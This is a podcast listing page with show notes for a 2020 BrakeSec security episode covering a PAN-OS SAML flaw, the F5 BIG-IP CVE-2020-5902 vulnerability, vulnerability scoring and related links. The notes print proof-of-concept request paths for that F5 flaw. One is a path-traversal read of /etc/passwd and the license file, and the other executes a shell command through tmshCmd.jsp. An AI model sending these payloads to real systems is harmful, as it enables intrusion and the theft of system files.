BrakeSec Education Podcast
BrakeSec Education Podcast
Bryan Brake, Amanda Berlin, and Brian Boettcher
Episodes
About
Reviews
Charts
Promote
2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!
58 minutes Posted Jul 7, 2020 at 11:04 pm.
0:00
58:22
Download MP3
Show notes

1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber

#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537

 F5 vulnerability:

https://www.wired.com/story/f5-big-ip-networking-vulnerability/

https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/

 

F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258

Redirect 404 /

 

https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE

F5 Big-IP CVE-2020-5902 LFI and RCE

LFI

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

or /etc/hosts

or /config/bigip.license

RCE

https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami

How to cope in a no-win situation:https://twitter.com/datSecuritychic/status/1280527467569008640

Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.

This podcast uses Libsyn for stats, and dynamic audio. Learn more on this podcast's About tab.
← See all 456 episodes of BrakeSec Education Podcast
Podbay © 2024 Fancy Soups
AboutAll Podcasts